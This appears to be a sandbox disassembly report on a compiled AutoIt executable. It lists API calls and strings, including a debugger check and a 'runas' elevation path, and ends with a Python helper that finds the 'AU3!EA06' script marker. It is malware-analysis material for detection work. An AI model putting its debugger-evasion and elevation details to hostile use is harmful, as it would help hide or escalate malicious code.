                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                            • _memmove.LIBCMT ref: 00409D96
                                                            • _memmove.LIBCMT ref: 0040A6C4
                                                            • _memmove.LIBCMT ref: 004297E5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                            • String ID:
                                                            • API String ID: 2383988440-0
                                                            • Opcode ID: 0a51d605390278972d17bc549f0a479dc83a3bb1102665bc1a1eaaf99b140ba9
                                                            • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                            • Opcode Fuzzy Hash: 0a51d605390278972d17bc549f0a479dc83a3bb1102665bc1a1eaaf99b140ba9
                                                            • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                              • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                              • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                            • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                            • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                              • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                            • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                            • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                            • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                              • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                              • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                              • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                              • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                              • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                              • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                              • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                              • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                              • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                              • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                              • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                              • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                            Strings
                                                            • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                            • runas, xrefs: 0042E2AD, 0042E2DC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                            • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                            • API String ID: 2495805114-3383388033
                                                            • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                            • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                            • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                            • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                                                            Control-flow Graph

                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                            • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                            • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                            • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                            • String ID: 0SH
                                                            • API String ID: 3363477735-851180471
                                                            • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                            • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                            • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                            • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                            APIs
                                                            • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: IsThemeActive$uxtheme.dll
                                                            • API String ID: 2574300362-3542929980
                                                            • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                            • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                            • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                            • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                            • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                            • TranslateMessage.USER32(?), ref: 00409556
                                                            • DispatchMessageW.USER32(?), ref: 00409561
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Message$Peek$DispatchSleepTranslate
                                                            • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                            • API String ID: 1762048999-758534266
                                                            • Opcode ID: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                                                            • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                            • Opcode Fuzzy Hash: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                                                            • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                                            Control-flow Graph

                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • __wcsicoll.LIBCMT ref: 00402007
                                                            • __wcsicoll.LIBCMT ref: 0040201D
                                                            • __wcsicoll.LIBCMT ref: 00402033
                                                              • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                            • __wcsicoll.LIBCMT ref: 00402049
                                                            • _wcscpy.LIBCMT ref: 0040207C
                                                            • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                                            • API String ID: 3948761352-1609664196
                                                            • Opcode ID: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                                                            • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                            • Opcode Fuzzy Hash: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                                                            • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                            • __wsplitpath.LIBCMT ref: 0040E41C
                                                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                            • _wcsncat.LIBCMT ref: 0040E433
                                                            • __wmakepath.LIBCMT ref: 0040E44F
                                                              • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                            • _wcscpy.LIBCMT ref: 0040E487
                                                              • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                            • _wcscat.LIBCMT ref: 00427541
                                                            • _wcslen.LIBCMT ref: 00427551
                                                            • _wcslen.LIBCMT ref: 00427562
                                                            • _wcscat.LIBCMT ref: 0042757C
                                                            • _wcsncpy.LIBCMT ref: 004275BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                            • String ID: Include$\
                                                            • API String ID: 3173733714-3429789819
                                                            • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                            • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                            • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                            • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                                                            Control-flow Graph

                                                            APIs
                                                            • _fseek.LIBCMT ref: 0045292B
                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                            • __fread_nolock.LIBCMT ref: 00452961
                                                            • __fread_nolock.LIBCMT ref: 00452971
                                                            • __fread_nolock.LIBCMT ref: 0045298A
                                                            • __fread_nolock.LIBCMT ref: 004529A5
                                                            • _fseek.LIBCMT ref: 004529BF
                                                            • _malloc.LIBCMT ref: 004529CA
                                                            • _malloc.LIBCMT ref: 004529D6
                                                            • __fread_nolock.LIBCMT ref: 004529E7
                                                            • _free.LIBCMT ref: 00452A17
                                                            • _free.LIBCMT ref: 00452A20
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                            • String ID:
                                                            • API String ID: 1255752989-0
                                                            • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                            • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                            • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                            • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock$_fseek_wcscpy
                                                            • String ID: FILE
                                                            • API String ID: 3888824918-3121273764
                                                            • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                            • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                            • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                            • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                            • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                            • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                            • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                            • ImageList_ReplaceIcon.COMCTL32(00991E18,000000FF,00000000), ref: 00410552
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                            • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                            • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                            • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                            • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                            • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                            • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                            • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                            • RegisterClassExW.USER32(?), ref: 0041045D
                                                              • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                              • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                              • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                              • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                              • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                              • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                              • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00991E18,000000FF,00000000), ref: 00410552
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                            • String ID: #$0$AutoIt v3
                                                            • API String ID: 423443420-4155596026
                                                            • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                            • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                            • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                            • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _malloc
                                                            • String ID: Default
                                                            • API String ID: 1579825452-753088835
                                                            • Opcode ID: 8d6a693bc28ede282e6a55fdab6cf0c37e3d7becfc9ec4ad637a350fdd6cb948
                                                            • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                            • Opcode Fuzzy Hash: 8d6a693bc28ede282e6a55fdab6cf0c37e3d7becfc9ec4ad637a350fdd6cb948
                                                            • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                            Control-flow Graph

                                                            • Control-flow graph (image not preserved): basic blocks 40f5c0-40f6df and 425d05-425d5f; calls to 422240, 413650, 410e60, 414d04, 4150d1, 414d30
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock_fseek_memmove_strcat
                                                            • String ID: AU3!$EA06
                                                            • API String ID: 1268643489-2658333250
                                                            • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                            • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                            • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                            • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
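                                                            The function above seeks through the file with _fseek/__fread_nolock and compares against the strings "AU3!" and "EA06", i.e. it is the AutoIt3 stub locating its appended compiled script. The following triage helper is an added example written for this report, not code from Joe Sandbox, from AutoIt or from the sample: it finds that marker in a file and reports whether it sits in the PE overlay, which is where a compiled AutoIt script normally lives. The two strings come from the report; the 16-byte prefix that precedes "AU3!EA06" in compiled scripts, the overlay arithmetic (end of the last section's raw data) and the constructed sample PE are the example's own assumptions.

```python
"""Locate the compiled-AutoIt script marker ("AU3!EA06") in a PE file.

Added example for this report; not code from Joe Sandbox, AutoIt or the sample.
The strings "AU3!" and "EA06" are taken from the disassembly listing; the
16-byte prefix, the overlay computation and the sample PE are assumptions.
"""
import struct

AU3_MAGIC = b"AU3!EA06"
# Assumed prefix seen before AU3!EA06 in compiled scripts (not from the report).
AU3_PREFIX = bytes.fromhex("A3484BBE986C4AA9994C530A86D6487D")


def overlay_offset(data):
    """Return the file offset where PE overlay data begins, or None if the
    buffer is not a PE. Overlay start is the largest
    PointerToRawData + SizeOfRawData over all section headers."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    num_sections, = struct.unpack_from("<H", data, e_lfanew + 6)
    opt_size, = struct.unpack_from("<H", data, e_lfanew + 20)
    sec_table = e_lfanew + 24 + opt_size
    end = 0
    for i in range(num_sections):
        off = sec_table + i * 40
        # SizeOfRawData and PointerToRawData sit at +16 and +20 in the header.
        raw_size, raw_ptr = struct.unpack_from("<II", data, off + 16)
        end = max(end, raw_ptr + raw_size)
    return end


def find_au3_markers(data):
    """Return [(offset, full_magic_present)] for every AU3!EA06 occurrence."""
    hits = []
    pos = data.find(AU3_MAGIC)
    while pos != -1:
        has_prefix = pos >= 16 and data[pos - 16:pos] == AU3_PREFIX
        hits.append((pos, has_prefix))
        pos = data.find(AU3_MAGIC, pos + 1)
    return hits


def triage(data):
    """Classify each marker hit as lying in the PE image, in the overlay,
    or 'unknown' when the buffer is not a PE at all."""
    ov = overlay_offset(data)
    result = []
    for off, pfx in find_au3_markers(data):
        if ov is None:
            region = "unknown"
        elif off >= ov:
            region = "overlay"
        else:
            region = "image"
        result.append({"offset": off, "full_magic": pfx, "region": region})
    return result


def build_sample():
    """Constructed test input: a minimal, non-runnable PE32 with one section
    and an AutoIt marker appended as overlay. Not derived from the sample."""
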